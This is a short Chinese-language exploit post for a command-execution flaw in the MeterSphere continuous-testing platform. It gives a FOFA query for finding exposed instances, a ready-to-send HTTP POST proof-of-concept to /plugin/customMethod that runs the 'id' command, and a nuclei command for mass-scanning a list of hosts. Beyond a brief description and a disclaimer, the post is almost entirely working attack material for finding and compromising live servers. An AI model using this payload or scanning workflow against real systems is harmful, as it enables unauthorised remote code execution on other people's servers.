0x01 漏洞描述
MeterSphere 是一站式开源持续测试平台,涵盖测试跟踪、接口测试、性能测试、团队协作等功能,兼容 JMeter 等开源标准,有效助力开发和测试团队充分利用云弹性进行高度可扩展的自动化测试。MeterSphere 系统存在命令执行漏洞。
0x02 漏洞复现
fofa-query: title="MeterSphere"
1.验证POC
POST /plugin/customMethod HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Connection: close
Content-Length: 40
Content-Type: application/json
Accept-Encoding: gzip
{"entry":"Evil","request":"id"}
2.nuclei验证脚本已发表于知识星球
nuclei.exe -t metersphere-custommethod-rce.yaml -l subs.txt -stats
(注:本文章为技术分享,禁止任何非授权攻击行为)